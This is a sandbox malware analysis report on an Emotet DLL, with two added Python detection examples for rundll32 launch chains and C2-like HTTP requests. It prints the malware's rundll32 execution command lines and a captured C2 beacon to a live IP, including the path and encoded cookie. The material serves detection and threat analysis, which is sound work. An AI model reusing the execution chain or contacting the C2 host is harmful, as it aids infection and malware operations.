
Windows Analysis Report nhlHEF5IVY

Overview

General Information

Sample Name: nhlHEF5IVY (renamed file extension from none to dll)
Analysis ID: 532437
MD5: 222719bd9555a8f48428737ab34a6fa6
SHA1: b56136e6d1460055917dcb74ed849c59b35300c0
SHA256: 81823e821dae4e623a5f11ccbed6e628443301afd92c0ab25e19d847927f5318
Tags: 32, dll, exe, trojan

Detection

Emotet
Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6640 cmdline: loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6648 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5444 cmdline: rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5472 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5128 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5436 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6804 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5364 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7000 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2588 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7016 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 3096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3124 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6152 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6028 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
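The tree above shows the chain that the Sigma rule later in this report fires on: a 32-bit rundll32.exe started with the dropped module C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb (a non-.dll extension inside a random-named sub-directory of the system directory) spawns a second rundll32.exe that calls the same file's Control_RunDLL export. Note that PID 6804's command line names System32 while the "File created" entry below records SysWOW64: a 32-bit process that opens System32 is redirected to SysWOW64 by WOW64 file-system redirection, so a detection has to treat both prefixes alike. The following is an added example, written for this edit and not part of the Joe Sandbox report nor the FPT.EagleEye Sigma rule, that flags that pattern in Sysmon-style process-creation events. The events are constructed from the tree above plus one benign control; the field names, the ALLOWED_SUBDIRS tuning list and the reason-per-trait output are assumptions.

```python
"""Flag rundll32 process-creation events that match the launch chain seen in
this report. Added, hypothetical detection logic; it is not the FPT.EagleEye
Sigma rule and not Joe Sandbox code."""
import re
from pathlib import PureWindowsPath

# Constructed from the report's process tree (Sysmon-style field names are an
# assumption) plus one benign control event at the end.
EVENTS = [
    {"ProcessId": 5444, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1'},
    {"ProcessId": 5472, "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL'},
    {"ProcessId": 5436, "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL'},
    {"ProcessId": 6804, "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL'},
    # Benign control (constructed): a Control Panel applet opened from Explorer.
    {"ProcessId": 4242, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL'},
]

# Module path (optionally quoted) followed by a comma and the export name.
# Paths that themselves contain a comma are not handled here.
_RUNDLL_ARGS = re.compile(r'rundll32\.exe"?\s+"?([^",]+)"?\s*,\s*(\S+)', re.IGNORECASE)

# Both spellings are treated alike: a 32-bit process that names System32 is
# redirected to SysWOW64 by WOW64 file-system redirection.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
EXPECTED_EXTENSIONS = {".dll", ".cpl"}        # what rundll32 normally loads
ALLOWED_SUBDIRS = ("spool\\drivers",)          # tuning placeholder (assumption)


def parse_rundll32(cmdline):
    """Return (module_path, export) from a rundll32 command line, or None."""
    m = _RUNDLL_ARGS.search(cmdline)
    return (m.group(1).strip(), m.group(2)) if m else None


def classify(event):
    """Return the reasons an event looks like this sample's rundll32 use ([] if none)."""
    if PureWindowsPath(event["Image"]).name.lower() != "rundll32.exe":
        return []
    parsed = parse_rundll32(event["CommandLine"])
    if parsed is None:
        return []
    module, export = parsed
    low = module.lower()
    reasons = []
    for sysdir in SYSTEM_DIRS:
        if low.startswith(sysdir + "\\"):
            rel = low[len(sysdir) + 1:]
            # The module sits in a sub-directory of the system directory, not in it.
            if "\\" in rel and not rel.startswith(ALLOWED_SUBDIRS):
                reasons.append("module in a sub-directory of the system directory: " + module)
    if PureWindowsPath(module).suffix.lower() not in EXPECTED_EXTENSIONS:
        reasons.append("extension rundll32 does not normally load: " + module)
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    if export.lower() == "control_rundll" and parent == "rundll32.exe":
        reasons.append("rundll32 re-launched by rundll32 via Control_RunDLL")
    return reasons


def flagged_events(events):
    """Return [(event, reasons)] for every event with at least one reason."""
    out = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            out.append((ev, reasons))
    return out


if __name__ == "__main__":
    for ev, reasons in flagged_events(EVENTS):
        print("PID %d: %s" % (ev["ProcessId"], "; ".join(reasons)))
```

Run against the constructed events, PIDs 5436 and 6804 are flagged on the dropped module's location and extension, and 5472 and 6804 on the rundll32-spawns-rundll32 Control_RunDLL re-launch; the sandbox harness's own `rundll32.exe "...\nhlHEF5IVY.dll",#1` (PID 5444) and the benign shell32.dll control are not. The sub-directory check is the one that needs tuning in production, since some legitimate components (printer drivers under spool\drivers, for example) are also loaded from nested system-directory paths.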

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |
| 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | |
| 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |
| 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | |
| 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |

(30 entries in total; only the first five are shown here)

Unpacked PEs

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0.2.loaddll32.exe.c13908.1.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |
| 0.2.loaddll32.exe.c13908.1.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | |
| 0.0.loaddll32.exe.950000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |
| 0.0.loaddll32.exe.950000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | |
| 0.0.loaddll32.exe.c13908.10.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security | |

(75 entries in total; only the first five are shown here)

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation
Source: Process started
Author: FPT.EagleEye
Data:
    Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
    CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
    CommandLine|base64offset|contains: (empty)
    Image: C:\Windows\SysWOW64\rundll32.exe
    NewProcessName: C:\Windows\SysWOW64\rundll32.exe
    OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
    ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL
    ParentImage: C:\Windows\SysWOW64\rundll32.exe
    ParentProcessId: 5436
    ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL
    ProcessId: 6804

                      Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: nhlHEF5IVY.dll  Virustotal: Detection: 21%
Source: nhlHEF5IVY.dll  ReversingLabs: Detection: 17%
Source: nhlHEF5IVY.dll  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknown  HTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: nhlHEF5IVY.dll  Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.915279800.00000000050C5000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.924793134.0000000001082000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_6E4C0927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 3_2_6E4C0927 FindFirstFileExW,

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe  Network Connect: 45.63.5.129 187
Source: Joe Sandbox View  ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View  JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic  HTTP traffic detected:
    GET /VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg HTTP/1.1
    Cookie: DrcWAKIBJWmaxqN=NkwkVocWd047SxLTnw1OvmLB+y7EbvgbbH9cDzoVcpFNOiH8TbRd17jGnTLmWNipx6naMHQIxHoYSzVPwPUBguk9zuItniypi2IIMHTegZbqkVJWwTqchKZCJEa8CdEJDkVjt2aOuEy16JVPzsPhYdLbDzfrtQosc0fVFxySiyuZ2Y7WCYm/zmeA1M6ob5o15LY+hv4X21nJF77G9R41fwzvyhf3rU3FrwDrOHqAa5sf6LUeLTTVybt/UQchOBgws/vF1s9/PZn3NrIJuPHQYfArST/6AkbLzBYTa3j/AcnEZVaziuy3cR+3TC1sv3ribYi1bvhCo7VVaHXnRaRtEAor7phXtz8N45GtA3gEiEudNIRjPwbX6uabhA==
    Host: 45.63.5.129
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown  Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown  Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown  TCP traffic detected without corresponding DNS query: 45.63.5.129 (10 occurrences)
Source: WerFault.exe, 00000011.00000002.960602395.000000000540C000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.959116367.000000000540C000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.959062497.00000000053F1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960586783.00000000053F1000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000003.1146026752.00000000034E4000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000002.1183923476.00000000034E4000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1153205743.0000024B21900000.00000004.00000001.sdmp  String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmp  String found in binary or memory: http://crl.m
Source: WerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmp  String found in binary or memory: http://crl.microsoft%C
Source: svchost.exe, 0000001B.00000002.1153046299.0000024B210EC000.00000004.00000001.sdmp  String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp  String found in binary or memory: http://help.disneyplus.com.
Source: Amcache.hve.14.dr  String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000013.00000002.1183844764.00000000034BA000.00000004.00000001.sdmp  String found in binary or memory: https://45.63.5.129/
Source: rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmp  String found in binary or memory: https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg
Source: rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmp  String found in binary or memory: https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXgRG
Source: rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmp  String found in binary or memory: https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg~
Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp  String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp  String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmp  String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001B.00000003.1130904279.0000024B21990000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130892648.0000024B2196E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130827300.0000024B219C8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130929870.0000024B21E02000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130914623.0000024B219B1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130856335.0000024B219C8000.00000004.00000001.sdmp  String found in binary or memory: https://www.tiktok.com/legal/report/feedback
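The captured GET above carries the traits that several of this report's signatures key on: no User-Agent header, a Host that is a bare IP (which is why the "TCP traffic detected without corresponding DNS query" entries exist), a long alphanumeric path with no extension, and a single cookie whose value is a base64 blob. The following is an added example, not Joe Sandbox code and not one of its signatures, that scores a raw request on those traits. The sample request is a constructed copy of the one captured above; the benign control request, the thresholds (a 40-character base64 run, a 20-character path) and the one-point-per-trait scoring are assumptions chosen for illustration.

```python
"""Score a raw HTTP request for the traits this report attributes to the
sample's C2 GET. Added heuristic for illustration; not Joe Sandbox's
signature logic and not part of the report."""
import ipaddress
import re

# Constructed copy of the request captured in the report (Host 45.63.5.129).
EMOTET_REQUEST = (
    "GET /VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg HTTP/1.1\r\n"
    "Cookie: DrcWAKIBJWmaxqN=NkwkVocWd047SxLTnw1OvmLB+y7EbvgbbH9cDzoVcpFNOiH8TbRd17jGnTLmWNipx6naMHQIxHoYSzVPwPUBguk9zuItniypi2IIMHTegZbqkVJWwTqchKZCJEa8CdEJDkVjt2aOuEy16JVPzsPhYdLbDzfrtQosc0fVFxySiyuZ2Y7WCYm/zmeA1M6ob5o15LY+hv4X21nJF77G9R41fwzvyhf3rU3FrwDrOHqAa5sf6LUeLTTVybt/UQchOBgws/vF1s9/PZn3NrIJuPHQYfArST/6AkbLzBYTa3j/AcnEZVaziuy3cR+3TC1sv3ribYi1bvhCo7VVaHXnRaRtEAor7phXtz8N45GtA3gEiEudNIRjPwbX6uabhA==\r\n"
    "Host: 45.63.5.129\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign control: an ordinary browser fetch by host name.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html\r\n"
    "\r\n"
)

_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long run of base64 alphabet
_RANDOM_PATH = re.compile(r"/[A-Za-z0-9]{20,}")       # no extension, no separators


def parse_request(raw):
    """Split an HTTP/1.x request head into (method, path, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def score_request(raw):
    """Count the C2-like traits present; each reason scores one point."""
    method, path, headers = parse_request(raw)
    reasons = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    host = headers.get("host", "").rsplit(":", 1)[0]   # drop an optional :port
    try:
        ipaddress.ip_address(host)
        reasons.append("Host is a bare IP address, so no DNS query precedes the connection")
    except ValueError:
        pass
    if _RANDOM_PATH.fullmatch(path):
        reasons.append("long alphanumeric path with no file extension")
    for part in headers.get("cookie", "").split(";"):
        _name, _, value = part.strip().partition("=")
        if _B64_BLOB.fullmatch(value):
            reasons.append("cookie value is a %d-char base64-like blob" % len(value))
            break
    return {"method": method, "score": len(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, raw in (("sample", EMOTET_REQUEST), ("benign", BENIGN_REQUEST)):
        result = score_request(raw)
        print(label, result["score"], result["reasons"])
```

The captured request scores on all four traits and the benign control on none. Because the sample sent this request over TLS 1.2 (see the HTTPS entry above), a check like this only runs where traffic is decrypted, in a sandbox or behind a TLS-inspecting proxy; on the wire, what remains visible is the JA3 client fingerprint and the direct-to-IP connection with no preceding DNS query.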

E-Banking Fraud:

Yara detected Emotet
Source: Yara match, file source: 0.2.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 8.2.rundll32.exe.3053568.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 8.2.rundll32.exe.3053568.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.7.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.rundll32.exe.952240.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.9.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.2e60000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.rundll32.exe.a60000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.rundll32.exe.952240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 19.2.rundll32.exe.33c0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.ce0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.rundll32.exe.a60000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.c42240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.10.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.950000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.0.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
